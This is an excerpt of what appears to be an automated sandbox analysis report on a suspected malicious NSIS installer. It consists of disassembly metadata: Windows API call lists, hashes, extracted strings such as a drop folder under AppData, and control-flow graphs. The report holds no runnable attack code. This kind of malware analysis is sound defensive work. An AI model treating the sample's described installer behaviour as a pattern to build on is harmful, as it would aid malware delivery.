                                                                                                                    • Instruction Fuzzy Hash: 60F17671D04229CBCF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7785A86CF45
                                                                                                                    APIs
                                                                                                                    • CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00402154
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInstance
                                                                                                                    • String ID: C:\Users\user\AppData\Local\magmaet\clenched
                                                                                                                    • API String ID: 542301482-536943358
                                                                                                                    • Opcode ID: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
                                                                                                                    • Instruction ID: 385f74efd5c92971cc76d3b11bce30356dc3a3525802f9592d77ec9fc6b050a7
                                                                                                                    • Opcode Fuzzy Hash: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
                                                                                                                    • Instruction Fuzzy Hash: E5412C75A00209AFCF00DFA4CD88AAD7BB5FF48314B20457AF915EB2D1DBB99A41CB54
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNELBASE(?,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0), ref: 004064D1
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004064DD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2295610775-0
                                                                                                                    • Opcode ID: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
                                                                                                                    • Instruction ID: 6f39d47423a9e3911ec825e8889a8cd4e4dbe9a09c05077791626206cca478a1
                                                                                                                    • Opcode Fuzzy Hash: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
                                                                                                                    • Instruction Fuzzy Hash: FED012715151209BC2901B787F0C85B7A989F553317128E36F46AF22E0C738CC67869C
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFindFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1974802433-0
                                                                                                                    • Opcode ID: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
                                                                                                                    • Instruction ID: f51a3655aa6281515c31db2bfa725e220f35cee11171475ca2a169fd8dd427bf
                                                                                                                    • Opcode Fuzzy Hash: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
                                                                                                                    • Instruction Fuzzy Hash: 09F05E716001149BC711EBA4DE49AAEB374EF04324F10057BE515E31E1D6B499459B2A

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 186 403d6f-403d81 187 403ec2-403ed1 186->187 188 403d87-403d8d 186->188 190 403f20-403f35 187->190 191 403ed3-403f1b GetDlgItem * 2 call 404247 SetClassLongW call 40140b 187->191 188->187 189 403d93-403d9c 188->189 192 403db1-403db4 189->192 193 403d9e-403dab SetWindowPos 189->193 195 403f75-403f7a call 404293 190->195 196 403f37-403f3a 190->196 191->190 198 403db6-403dc8 ShowWindow 192->198 199 403dce-403dd4 192->199 193->192 203 403f7f-403f9a 195->203 201 403f3c-403f47 call 401389 196->201 202 403f6d-403f6f 196->202 198->199 204 403df0-403df3 199->204 205 403dd6-403deb DestroyWindow 199->205 201->202 223 403f49-403f68 SendMessageW 201->223 202->195 208 404214 202->208 209 403fa3-403fa9 203->209 210 403f9c-403f9e call 40140b 203->210 214 403df5-403e01 SetWindowLongW 204->214 215 403e06-403e0c 204->215 212 4041f1-4041f7 205->212 211 404216-40421d 208->211 219 4041d2-4041eb DestroyWindow EndDialog 209->219 220 403faf-403fba 209->220 210->209 212->208 217 4041f9-4041ff 212->217 214->211 221 403e12-403e23 GetDlgItem 215->221 222 403eaf-403ebd call 4042ae 215->222 217->208 225 404201-40420a ShowWindow 217->225 219->212 220->219 226 403fc0-40400d call 4061a5 call 404247 * 3 GetDlgItem 220->226 227 403e42-403e45 221->227 228 403e25-403e3c SendMessageW IsWindowEnabled 221->228 222->211 223->211 225->208 256 404017-404053 ShowWindow KiUserCallbackDispatcher call 404269 EnableWindow 226->256 257 40400f-404014 226->257 231 403e47-403e48 227->231 232 403e4a-403e4d 227->232 228->208 228->227 234 403e78-403e7d call 404220 231->234 235 403e5b-403e60 232->235 236 403e4f-403e55 232->236 234->222 237 403e96-403ea9 SendMessageW 235->237 239 403e62-403e68 235->239 236->237 238 403e57-403e59 236->238 237->222 238->234 242 403e6a-403e70 call 40140b 239->242 243 403e7f-403e88 call 40140b 239->243 252 403e76 242->252 243->222 253 403e8a-403e94 243->253 252->234 253->252 260 404055-404056 256->260 261 404058 256->261 257->256 262 40405a-404088 GetSystemMenu EnableMenuItem SendMessageW 260->262 261->262 263 40408a-40409b SendMessageW 262->263 264 40409d 262->264 265 4040a3-4040e1 call 40427c call 406183 lstrlenW call 4061a5 SetWindowTextW call 401389 263->265 264->265 265->203 274 4040e7-4040e9 265->274 274->203 275 4040ef-4040f3 274->275 276 404112-404126 DestroyWindow 275->276 277 4040f5-4040fb 275->277 276->212 279 40412c-404159 CreateDialogParamW 276->279 277->208 278 404101-404107 277->278 278->203 280 40410d 278->280 279->212 281 40415f-4041b6 call 404247 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->281 280->208 281->208 286 4041b8-4041cb ShowWindow call 404293 281->286 288 4041d0 286->288 288->212
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DAB
                                                                                                                    • ShowWindow.USER32(?), ref: 00403DC8
                                                                                                                    • DestroyWindow.USER32 ref: 00403DDC
                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF8
                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403E19
                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E2D
                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403E34
                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403EE2
                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403EEC
                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403F06
                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F57
                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403FFD
                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 0040401E
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404030
                                                                                                                    • EnableWindow.USER32(?,?), ref: 0040404B
                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404061
                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00404068
                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404080
                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404093
                                                                                                                    • lstrlenW.KERNEL32(00423748,?,00423748,00429260), ref: 004040BC
                                                                                                                    • SetWindowTextW.USER32(?,00423748), ref: 004040D0
                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404204
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                    • String ID: H7B
                                                                                                                    • API String ID: 3282139019-2300413410
                                                                                                                    • Opcode ID: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
                                                                                                                    • Instruction ID: 25c141fc174ea51021f963d75397c5770897fb54822066ed0df1b6b59a0401a8
                                                                                                                    • Opcode Fuzzy Hash: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
                                                                                                                    • Instruction Fuzzy Hash: EFC1CFB1644200FBDB216F61EE84D2B7B78EB98745F40097EF641B51F0CB3998529B2E

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 289 4039cc-4039e4 call 406559 292 4039e6-4039f6 call 4060ca 289->292 293 4039f8-403a2f call 406050 289->293 302 403a52-403a7b call 403ca2 call 405c3f 292->302 298 403a31-403a42 call 406050 293->298 299 403a47-403a4d lstrcatW 293->299 298->299 299->302 307 403a81-403a86 302->307 308 403b0d-403b15 call 405c3f 302->308 307->308 309 403a8c-403ab4 call 406050 307->309 314 403b23-403b48 LoadImageW 308->314 315 403b17-403b1e call 4061a5 308->315 309->308 316 403ab6-403aba 309->316 318 403bc9-403bd1 call 40140b 314->318 319 403b4a-403b7a RegisterClassW 314->319 315->314 320 403acc-403ad8 lstrlenW 316->320 321 403abc-403ac9 call 405b64 316->321 332 403bd3-403bd6 318->332 333 403bdb-403be6 call 403ca2 318->333 322 403b80-403bc4 SystemParametersInfoW CreateWindowExW 319->322 323 403c98 319->323 327 403b00-403b08 call 405b37 call 406183 320->327 328 403ada-403ae8 lstrcmpiW 320->328 321->320 322->318 326 403c9a-403ca1 323->326 327->308 328->327 331 403aea-403af4 GetFileAttributesW 328->331 336 403af6-403af8 331->336 337 403afa-403afb call 405b83 331->337 332->326 342 403bec-403c06 ShowWindow call 4064ed 333->342 343 403c6f-403c70 call 4053b5 333->343 336->327 336->337 337->327 350 403c12-403c24 GetClassInfoW 342->350 351 403c08-403c0d call 4064ed 342->351 347 403c75-403c77 343->347 348 403c91-403c93 call 40140b 347->348 349 403c79-403c7f 347->349 348->323 349->332 352 403c85-403c8c call 40140b 349->352 355 403c26-403c36 GetClassInfoW RegisterClassW 350->355 356 403c3c-403c5f DialogBoxParamW call 40140b 350->356 351->350 352->332 355->356 360 403c64-403c6d call 40391c 356->360 360->326
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                                      • Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                                    • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,756F3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00403A4D
                                                                                                                    • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,756F3420), ref: 00403ACD
                                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403AE0
                                                                                                                    • GetFileAttributesW.KERNEL32(: Completed), ref: 00403AEB
                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\magmaet\clenched), ref: 00403B34
                                                                                                                      • Part of subcall function 004060CA: wsprintfW.USER32 ref: 004060D7
                                                                                                                    • RegisterClassW.USER32(00429200), ref: 00403B71
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B89
                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BBE
                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403BF4
                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403C20
                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403C2D
                                                                                                                    • RegisterClassW.USER32(00429200), ref: 00403C36
                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403D6F,00000000), ref: 00403C55
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                    • String ID: "C:\Users\user\Desktop\RmIYOfX0yO.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                    • API String ID: 1975747703-2320600929
                                                                                                                    • Opcode ID: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
                                                                                                                    • Instruction ID: 56c0b88d72ef28cc24ab3b3da6b812fbe5e4610ed82a7e8ff487d4c0aa16eca4
                                                                                                                    • Opcode Fuzzy Hash: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
                                                                                                                    • Instruction Fuzzy Hash: E261C270240600BAD720AF66AD45F2B3A7CEB84B09F40447EF945B22E2DB7D69118A3D

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 363 402e41-402e8f GetTickCount GetModuleFileNameW call 405d58 366 402e91-402e96 363->366 367 402e9b-402ec9 call 406183 call 405b83 call 406183 GetFileSize 363->367 368 4030e0-4030e4 366->368 375 402fb9-402fc7 call 402d9f 367->375 376 402ecf-402ee6 367->376 383 403098-40309d 375->383 384 402fcd-402fd0 375->384 378 402ee8 376->378 379 402eea-402ef7 call 403358 376->379 378->379 385 403054-40305c call 402d9f 379->385 386 402efd-402f03 379->386 383->368 387 402fd2-402fea call 40336e call 403358 384->387 388 402ffc-403048 GlobalAlloc call 406678 call 405d87 CreateFileW 384->388 385->383 389 402f83-402f87 386->389 390 402f05-402f1d call 405d13 386->390 387->383 411 402ff0-402ff6 387->411 414 40304a-40304f 388->414 415 40305e-40308e call 40336e call 4030e7 388->415 394 402f90-402f96 389->394 395 402f89-402f8f call 402d9f 389->395 390->394 409 402f1f-402f26 390->409 402 402f98-402fa6 call 40660a 394->402 403 402fa9-402fb3 394->403 395->394 402->403 403->375 403->376 409->394 413 402f28-402f2f 409->413 411->383 411->388 413->394 416 402f31-402f38 413->416 414->368 422 403093-403096 415->422 416->394 418 402f3a-402f41 416->418 418->394 420 402f43-402f63 418->420 420->383 423 402f69-402f6d 420->423 422->383 424 40309f-4030b0 422->424 425 402f75-402f7d 423->425 426 402f6f-402f73 423->426 427 4030b2 424->427 428 4030b8-4030bd 424->428 425->394 429 402f7f-402f81 425->429 426->375 426->425 427->428 430 4030be-4030c4 428->430 429->394 430->430 431 4030c6-4030de call 405d13 430->431 431->368
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 00402E55
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RmIYOfX0yO.exe,00000400), ref: 00402E71
                                                                                                                      • Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\RmIYOfX0yO.exe,80000000,00000003), ref: 00405D5C
                                                                                                                      • Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RmIYOfX0yO.exe,C:\Users\user\Desktop\RmIYOfX0yO.exe,80000000,00000003), ref: 00402EBA
                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403001
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                    • String ID: "C:\Users\user\Desktop\RmIYOfX0yO.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RmIYOfX0yO.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                    • API String ID: 2803837635-3382077929
                                                                                                                    • Opcode ID: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
                                                                                                                    • Instruction ID: 78d4ac72044dd1d4b64dcf5cb9e774c3474f7f20f7d9c099438d2fbc404b67ba
                                                                                                                    • Opcode Fuzzy Hash: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
                                                                                                                    • Instruction Fuzzy Hash: 6961E231900215AFDB209F75DD49B9E7AB8AB04359F20817FFA00B62C1CBB99A458B5D

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 560 401767-40178c call 402bbf call 405bae 565 401796-4017a8 call 406183 call 405b37 lstrcatW 560->565 566 40178e-401794 call 406183 560->566 571 4017ad-4017ae call 406417 565->571 566->571 575 4017b3-4017b7 571->575 576 4017b9-4017c3 call 4064c6 575->576 577 4017ea-4017ed 575->577 584 4017d5-4017e7 576->584 585 4017c5-4017d3 CompareFileTime 576->585 579 4017f5-401811 call 405d58 577->579 580 4017ef-4017f0 call 405d33 577->580 587 401813-401816 579->587 588 401885-4018ae call 4052e2 call 4030e7 579->588 580->579 584->577 585->584 589 401867-401871 call 4052e2 587->589 590 401818-401856 call 406183 * 2 call 4061a5 call 406183 call 4058c8 587->590 602 4018b0-4018b4 588->602 603 4018b6-4018c2 SetFileTime 588->603 600 40187a-401880 589->600 590->575 623 40185c-40185d 590->623 604 402a55 600->604 602->603 606 4018c8-4018d3 CloseHandle 602->606 603->606 607 402a57-402a5b 604->607 609 4018d9-4018dc 606->609 610 402a4c-402a4f 606->610 612 4018f1-4018f4 call 4061a5 609->612 613 4018de-4018ef call 4061a5 lstrcatW 609->613 610->604 617 4018f9-40228d call 4058c8 612->617 613->617 617->607 617->610 623->600 625 40185f-401860 623->625 625->589
                                                                                                                    APIs
                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched,?,?,00000031), ref: 004017A8
                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched,?,?,00000031), ref: 004017CD
                                                                                                                      • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                                      • Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                      • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                      • Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                      • Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                      • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
